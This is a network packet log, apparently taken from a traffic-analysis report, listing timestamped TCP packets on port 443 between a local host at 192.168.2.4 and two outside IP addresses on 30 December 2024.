                                                                                                                                                                    Dec 30, 2024 04:59:42.710793972 CET44349922142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:42.710834980 CET49922443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:42.710865974 CET49922443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:42.710876942 CET44349922142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:42.710886002 CET49922443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:42.710917950 CET49922443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:42.711225033 CET49928443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:42.711251974 CET44349928142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:42.711318016 CET49928443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:42.711472988 CET49928443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:42.711486101 CET44349928142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:42.734685898 CET49923443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:42.734720945 CET49924443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:42.734740973 CET49925443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:42.735039949 CET49929443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:42.735053062 CET44349929142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:42.735310078 CET49930443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:42.735359907 CET49929443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:42.735368013 CET44349930142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:42.735434055 CET49930443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:42.736005068 CET49929443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:42.736018896 CET44349929142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:42.736207008 CET49930443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:42.736238003 CET44349930142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:42.736520052 CET49931443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:42.736546040 CET44349931142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:42.736608982 CET49931443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:42.736927986 CET49931443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:42.736938000 CET44349931142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:43.319144011 CET44349928142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:43.320904970 CET49928443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:43.321264982 CET49928443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:43.321270943 CET44349928142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:43.321429014 CET49928443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:43.321434021 CET44349928142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:43.334398031 CET44349929142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:43.334697008 CET44349931142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:43.334801912 CET49929443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:43.334801912 CET49931443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:43.335239887 CET49929443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:43.335249901 CET44349929142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:43.335441113 CET44349931142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:43.335500002 CET49931443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:43.336846113 CET49931443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:43.336853981 CET44349931142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:43.337066889 CET49929443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:43.337074995 CET44349929142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:43.337080956 CET44349931142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:43.337133884 CET49931443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:43.337409019 CET49931443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:43.353821993 CET44349930142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:43.356993914 CET49930443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:43.357362986 CET49930443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:43.357369900 CET44349930142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:43.357419014 CET49930443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:43.357424974 CET44349930142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:43.383366108 CET44349931142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:43.698288918 CET44349928142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:43.698347092 CET44349928142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:43.698348999 CET49928443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:43.698390007 CET49928443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:43.698446989 CET49928443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:43.698471069 CET44349928142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:43.698479891 CET49928443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:43.698507071 CET49928443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:43.698970079 CET49932443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:43.699002028 CET44349932142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:43.699076891 CET49932443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:43.699306965 CET49932443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:43.699322939 CET44349932142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:43.704008102 CET44349931142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:43.704061985 CET49931443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:43.704073906 CET44349931142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:43.704087019 CET44349931142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:43.704114914 CET49931443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:43.704129934 CET49931443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:43.704178095 CET49931443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:43.704186916 CET44349931142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:43.704585075 CET49933443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:43.704674959 CET44349933142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:43.704750061 CET49933443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:43.704900026 CET49933443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:43.704933882 CET44349933142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:43.747554064 CET44349929142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:45.673820972 CET44349937142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:45.673860073 CET44349937142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:45.673919916 CET49937443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:45.673978090 CET49937443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:45.674218893 CET49937443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:45.674232960 CET44349937142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:45.674734116 CET49942443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:45.674829960 CET44349942142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:45.674895048 CET49942443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:45.675067902 CET49942443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:45.675100088 CET44349942142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:45.784902096 CET44349938142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:45.784956932 CET44349938142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:45.784965038 CET49938443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:45.784980059 CET44349938142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:45.784996986 CET49938443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:45.785037041 CET49938443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:45.785043001 CET44349938142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:45.785063982 CET44349938142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:45.785094023 CET49938443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:45.785109997 CET49938443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:45.785866976 CET49938443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:45.785877943 CET44349938142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:45.786261082 CET49943443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:45.786298990 CET44349943142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:45.786369085 CET49943443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:45.786519051 CET49943443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:45.786531925 CET44349943142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:45.944875002 CET44349939142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:45.944927931 CET44349939142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:45.944952011 CET49939443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:45.944989920 CET44349939142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:45.945018053 CET49939443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:45.945065975 CET44349939142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:45.945120096 CET49939443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:45.945744991 CET49939443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:45.945769072 CET44349939142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:45.946171045 CET49944443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:45.946214914 CET44349944142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:45.946270943 CET49944443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:45.946470022 CET49944443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:45.946485043 CET44349944142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:46.278059959 CET44349942142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:46.278234959 CET49942443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:46.278882027 CET49942443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:46.278914928 CET44349942142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:46.280608892 CET49942443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:46.280623913 CET44349942142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:46.290956020 CET44349941142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:46.291023970 CET49941443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:46.291250944 CET49941443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:46.291260004 CET44349941142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:46.291367054 CET49941443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:46.291373014 CET44349941142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:46.388906002 CET44349943142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:46.389008999 CET49943443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:46.389586926 CET49943443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:46.389595032 CET44349943142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:46.389710903 CET49943443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:46.389717102 CET44349943142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:46.560118914 CET44349944142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:46.560223103 CET49944443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:46.560858965 CET49944443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:46.560864925 CET44349944142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:46.561003923 CET49944443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:46.561008930 CET44349944142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:46.743819952 CET44349942142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:46.743915081 CET49942443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:46.743974924 CET44349942142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:46.744035006 CET49942443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:46.744082928 CET49942443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:46.744126081 CET44349942142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:46.744179964 CET49942443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:46.744604111 CET49947443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:46.744642019 CET44349947142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:46.744708061 CET49947443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:46.744898081 CET49947443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:46.744911909 CET44349947142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:46.750216007 CET49941443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:46.750232935 CET49943443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:46.750296116 CET49944443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:46.750571966 CET49948443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:46.750603914 CET44349948142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:46.750659943 CET49948443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:46.751127005 CET49949443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:46.751202106 CET44349949142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:46.751266956 CET49949443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:46.751928091 CET49949443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:46.751960039 CET44349949142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:46.752373934 CET49948443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:46.752391100 CET44349948142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:47.353126049 CET44349947142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:47.353200912 CET49947443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:47.353770971 CET44349947142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:47.353816986 CET49947443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:47.369456053 CET44349948142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:47.369519949 CET49948443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:47.370094061 CET44349948142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:47.370158911 CET49948443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:47.377929926 CET44349949142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:47.377993107 CET49949443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:47.491099119 CET49947443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:47.491121054 CET44349947142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:47.491341114 CET44349947142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:47.491396904 CET49947443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:47.502871037 CET49947443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:47.503377914 CET49948443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:47.503396034 CET44349948142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:47.503623962 CET44349948142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:47.503673077 CET49948443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:47.506958961 CET49949443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:47.506990910 CET44349949142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:47.514890909 CET49949443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:47.514919996 CET44349949142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:47.518188000 CET49948443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:47.547334909 CET44349947142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:47.563374043 CET44349948142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:47.799376011 CET44349947142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:47.800538063 CET44349947142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:49.783715010 CET49955443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:49.783715010 CET49955443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:49.783757925 CET44349955142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:49.783808947 CET49955443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:49.784707069 CET49961443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:49.784742117 CET44349961142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:49.784821987 CET49961443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:49.788887024 CET49961443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:49.788902998 CET44349961142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:49.870619059 CET44349956142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:49.870656967 CET44349956142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:49.870675087 CET49956443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:49.870681047 CET44349956142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:49.870703936 CET49956443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:49.870732069 CET49956443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:49.870734930 CET44349956142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:49.870827913 CET49956443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:49.871275902 CET49956443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:49.871284962 CET44349956142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:49.871669054 CET49962443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:49.871701002 CET44349962142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:49.871747017 CET49962443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:49.872294903 CET49962443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:49.872308969 CET44349962142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:49.983362913 CET44349957142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:49.983580112 CET44349957142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:49.983649015 CET49957443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:49.983855009 CET49957443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:49.983870029 CET44349957142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:49.984316111 CET49963443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:49.984349012 CET44349963142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:49.984402895 CET49963443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:49.984699965 CET49963443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:49.984718084 CET44349963142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:50.022695065 CET44349958142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:50.022732973 CET44349958142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:50.022800922 CET49958443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:50.022805929 CET44349958142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:50.022814989 CET44349958142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:50.022850037 CET49958443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:50.027750015 CET49958443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:50.027755022 CET44349958142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:50.029315948 CET49964443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:50.029345036 CET44349964142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:50.029793978 CET49964443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:50.030139923 CET49964443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:50.030153036 CET44349964142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:50.415106058 CET44349961142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:50.416929960 CET49961443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:50.427786112 CET49961443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:50.427793980 CET44349961142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:50.429657936 CET49961443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:50.429663897 CET44349961142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:50.489543915 CET44349962142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:50.492928982 CET49962443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:50.539509058 CET49962443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:50.539519072 CET44349962142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:50.539663076 CET49962443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:50.539668083 CET44349962142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:50.593311071 CET44349963142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:50.594954014 CET49963443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:50.598364115 CET49963443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:50.598370075 CET44349963142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:50.598557949 CET49963443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:50.598562956 CET44349963142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:50.642101049 CET44349964142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:50.642189026 CET49964443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:50.669837952 CET49964443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:50.669867039 CET44349964142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:50.670003891 CET49964443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:50.670016050 CET44349964142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:50.770989895 CET49961443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:50.771007061 CET49962443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:50.771020889 CET49963443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:50.771058083 CET49964443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:50.773156881 CET49965443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:50.773179054 CET44349965142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:50.773253918 CET49965443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:50.774029016 CET49965443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:50.774039030 CET44349965142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:50.775645018 CET49966443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:50.775679111 CET44349966142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:50.775733948 CET49966443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:50.776046991 CET49966443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:50.776061058 CET44349966142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:51.373009920 CET44349965142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:51.373083115 CET49965443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:51.373433113 CET49965443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:51.373439074 CET44349965142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:51.373594046 CET49965443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:51.373598099 CET44349965142.250.181.238192.168.2.4
